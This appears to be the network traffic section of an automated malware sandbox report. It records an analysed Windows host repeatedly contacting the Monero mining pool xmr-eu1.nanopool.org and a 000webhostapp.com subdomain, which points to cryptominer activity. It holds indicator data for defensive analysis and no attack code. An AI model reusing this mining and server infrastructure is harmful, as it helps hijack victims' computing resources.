                                                                                                                              Apr 26, 2024 16:48:32.408111095 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.408140898 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.409710884 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.409778118 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.411302090 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.411391973 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.411446095 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.411456108 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.411490917 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.452122927 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.688256979 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.688636065 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.688695908 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.695955992 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.695990086 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:42.213815928 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:42.286014080 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:52.327361107 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:52.481817961 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:59.234133005 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:48:59.234174013 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:59.234250069 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:48:59.234667063 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:48:59.234678984 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:59.722876072 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:59.723033905 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:48:59.727869034 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:48:59.727884054 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:59.728138924 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:59.737663984 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:48:59.784121037 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.195792913 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.195821047 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.195893049 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.195980072 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.196003914 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.196036100 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.196074009 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.196243048 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.196288109 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.196316957 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.196327925 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.196357012 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.196377993 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.196407080 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.278582096 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.278642893 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:00.278728008 CEST49755443192.168.2.413.85.23.86
                                                                                                                              Apr 26, 2024 16:49:00.278745890 CEST4434975513.85.23.86192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:02.280628920 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:02.476924896 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:49:10.484718084 CEST4972480192.168.2.4199.232.214.172
                                                                                                                              Apr 26, 2024 16:49:10.616179943 CEST8049724199.232.214.172192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:10.616250038 CEST8049724199.232.214.172192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:10.616331100 CEST4972480192.168.2.4199.232.214.172
                                                                                                                              Apr 26, 2024 16:49:11.356465101 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:11.473737001 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:49:13.267535925 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:13.267608881 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:13.267729044 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:13.267934084 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:13.267975092 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:13.593971014 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:13.594304085 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:13.594342947 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:13.595453024 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:13.595523119 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:13.599821091 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:13.599915981 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:13.774291992 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:13.774331093 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:13.882658958 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:18.272608042 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:18.272804976 CEST44349760142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:18.272897959 CEST49760443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:49:21.220750093 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:21.286577940 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:49:28.476296902 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.476391077 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:28.476485014 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.512381077 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.512443066 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:28.808351994 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:28.809648037 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.809684992 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:28.810756922 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:28.810862064 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.812755108 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.812834978 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:28.812895060 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.812906027 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:28.812989950 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:28.856122971 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:29.106182098 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:29.106564999 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:29.106642962 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:29.115417957 CEST49764443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:49:29.115447998 CEST44349764145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:31.270566940 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:31.473922968 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:49:41.239773035 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:41.286797047 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:49:51.240536928 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:51.380203009 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:50:01.783925056 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:01.974109888 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:50:11.273602009 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:11.421055079 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:50:16.091291904 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:16.286885977 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:50:26.314888000 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:26.380477905 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:50:29.147934914 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.147973061 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.148034096 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.170228958 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.170247078 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.463610888 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.464976072 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.464999914 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.466006994 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.466146946 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.467883110 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.467967033 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.468055010 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.468070984 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.584125042 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.758374929 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.758529902 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:29.758625984 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.771152020 CEST49774443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:50:29.771171093 CEST44349774145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:36.202159882 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:36.285856009 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:50:46.187920094 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:46.286660910 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:50:56.726886988 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:56.786330938 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:51:06.240355015 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:06.286591053 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:51:16.114801884 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:16.193635941 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:51:26.162651062 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:26.286571026 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:51:27.834971905 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:27.835059881 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:27.835356951 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:27.843604088 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:27.843683004 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.141655922 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.142802000 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.142829895 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.143845081 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.143913984 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.145634890 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.145706892 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.145765066 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.145772934 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.145839930 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.188200951 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.438810110 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.438939095 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:28.439060926 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.443361998 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.443361998 CEST49782443192.168.2.4145.14.144.16
                                                                                                                              Apr 26, 2024 16:51:28.443427086 CEST44349782145.14.144.16192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:36.211846113 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:36.387793064 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:51:46.316696882 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:46.473875999 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:51:56.298923969 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:56.474101067 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:52:06.304697037 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:52:06.452301979 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Apr 26, 2024 16:48:09.194641113 CEST53639461.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.231174946 CEST6396353192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:48:09.231331110 CEST6111653192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:48:09.321755886 CEST53641711.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.356316090 CEST53611161.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.357132912 CEST53639631.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.733133078 CEST53506721.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.329024076 CEST138138192.168.2.4192.168.2.255
                                                                                                                              Apr 26, 2024 16:48:27.732961893 CEST6532353192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST53653231.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:31.310003042 CEST53569551.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:31.439012051 CEST6177953192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:48:32.083154917 CEST53617791.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:46.275629997 CEST5732053192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:48:46.921137094 CEST53573201.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:50.289114952 CEST53503811.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:08.710376024 CEST53651001.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:14.585880041 CEST53644181.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:49:40.538429976 CEST53642421.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:26.603871107 CEST53638021.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:28.505067110 CEST6532953192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:50:29.147090912 CEST53653291.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:50:43.437509060 CEST5190653192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:50:44.089050055 CEST53519061.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:08.053539038 CEST5978853192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:51:08.697860003 CEST53597881.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:42.255011082 CEST53558141.1.1.1192.168.2.4
                                                                                                                              Apr 26, 2024 16:51:57.413254976 CEST6356953192.168.2.41.1.1.1
                                                                                                                              Apr 26, 2024 16:51:58.066123009 CEST53635691.1.1.1192.168.2.4
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Apr 26, 2024 16:48:09.231174946 CEST192.168.2.41.1.1.10x7f46Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:09.231331110 CEST192.168.2.41.1.1.10xfa07Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.732961893 CEST192.168.2.41.1.1.10xe2beStandard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:31.439012051 CEST192.168.2.41.1.1.10x3d96Standard query (0)pachydermal-deviati.000webhostapp.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:46.275629997 CEST192.168.2.41.1.1.10x21cdStandard query (0)pachydermal-deviati.000webhostapp.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:50:28.505067110 CEST192.168.2.41.1.1.10x83d0Standard query (0)pachydermal-deviati.000webhostapp.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:50:43.437509060 CEST192.168.2.41.1.1.10xc66cStandard query (0)pachydermal-deviati.000webhostapp.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:51:08.053539038 CEST192.168.2.41.1.1.10xc5cStandard query (0)pachydermal-deviati.000webhostapp.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:51:57.413254976 CEST192.168.2.41.1.1.10x7e36Standard query (0)pachydermal-deviati.000webhostapp.comA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Apr 26, 2024 16:48:09.356316090 CEST1.1.1.1192.168.2.40xfa07No error (0)www.google.com65IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:09.357132912 CEST1.1.1.1192.168.2.40x7f46No error (0)www.google.com142.250.64.196A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:27.859253883 CEST1.1.1.1192.168.2.40xe2beNo error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:32.083154917 CEST1.1.1.1192.168.2.40x3d96No error (0)pachydermal-deviati.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:32.083154917 CEST1.1.1.1192.168.2.40x3d96No error (0)us-east-1.route-1.000webhost.awex.io145.14.144.253A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:46.921137094 CEST1.1.1.1192.168.2.40x21cdNo error (0)pachydermal-deviati.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:48:46.921137094 CEST1.1.1.1192.168.2.40x21cdNo error (0)us-east-1.route-1.000webhost.awex.io145.14.144.9A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:50:29.147090912 CEST1.1.1.1192.168.2.40x83d0No error (0)pachydermal-deviati.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:50:29.147090912 CEST1.1.1.1192.168.2.40x83d0No error (0)us-east-1.route-1.000webhost.awex.io145.14.144.16A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:50:44.089050055 CEST1.1.1.1192.168.2.40xc66cNo error (0)pachydermal-deviati.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:50:44.089050055 CEST1.1.1.1192.168.2.40xc66cNo error (0)us-east-1.route-1.000webhost.awex.io145.14.144.16A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:51:08.697860003 CEST1.1.1.1192.168.2.40xc5cNo error (0)pachydermal-deviati.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:51:08.697860003 CEST1.1.1.1192.168.2.40xc5cNo error (0)us-east-1.route-1.000webhost.awex.io145.14.145.134A (IP address)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:51:58.066123009 CEST1.1.1.1192.168.2.40x7e36No error (0)pachydermal-deviati.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 26, 2024 16:51:58.066123009 CEST1.1.1.1192.168.2.40x7e36No error (0)us-east-1.route-1.000webhost.awex.io145.14.145.9A (IP address)IN (0x0001)false
                                                                                                                              • www.google.com
                                                                                                                              • slscr.update.microsoft.com
                                                                                                                              • pachydermal-deviati.000webhostapp.com
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.449735142.250.64.1964437880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:10 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                              Host: www.google.com
                                                                                                                              Connection: keep-alive
                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-04-26 14:48:11 UTC1703INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:11 GMT
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: -1
                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-NJ78_go9Ual52LvHKH0zTQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                              Permissions-Policy: unload=()
                                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
